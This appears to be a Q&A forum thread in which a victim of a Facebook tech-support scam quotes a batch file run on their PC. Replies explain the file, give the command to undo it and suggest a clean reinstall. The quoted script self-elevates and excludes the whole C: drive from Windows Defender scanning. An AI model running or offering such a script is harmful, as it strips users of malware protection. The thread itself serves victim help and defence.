# I fall for prey of an unknown person on Facebook he installed an application on my PC and run this code from a .bat file

Tags: file, batch-file

Hi I was having some difficulty with my Facebook page I posted on a random FB group about the problem a person told me that he can help.

We came live on TeamViewer and he secretly installed a program and ran a notepad.bat file which consisted below code.

```
@echo off
if not "%1"=="am_admin" (powershell start -verb runas '%0' am_admin & exit /b)
start cmd /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:""
start notepad.exe
```

I deleted the .bat file, deleted the software he secretly downloaded and removed the application which was in my PC's startup.

Now can anyone know what does above code do and any precautions I should take now?

I am looking for a potential solution a mistake I made and want someone to help me in this regard.

Comment: The batch file essentially added an exclusion path of ```C:```, to the Windows Defender Preferences list. All you really need to do is remove that again by opening a Windows PowerShell Prompt using the 'Run as administrator' option, then type ```Remove-MpPreference -ExclusionPath "C:"``` and press the `[ENTER]` key. But please note the information in the currently given answer too.

Answer (score 1):

I recommend you to change all your passwords for Facebook and anything else
and clean format install Windows, Install Malwarebytes and Kaspersky and do a scan before moving your important files for backup and before installing a clean Windows. Clean Windows Install is highly recommended.

It's clear that he installed malware to steal passwords and important informations.

This what the .bat does:

This is a Windows batch script that adds an exclusion path to Windows Defender and then opens Notepad.

Here's how the script works:

The `@echo off` statement turns off command echoing in the console window.
The if not `"%1"=="am_admin"` statement checks if the script is being run with administrator privileges. If it is not, the script relaunches itself with administrator privileges using the `powershell start -verb runas '%0' am_admin & exit /b` command, and then exits.
The `Add-MpPreference -ExclusionPath "C:"` command adds the C: drive as an exclusion path in Windows Defender. This means that Windows Defender will not scan files located in the C: drive.
The `start notepad.exe` command opens Notepad.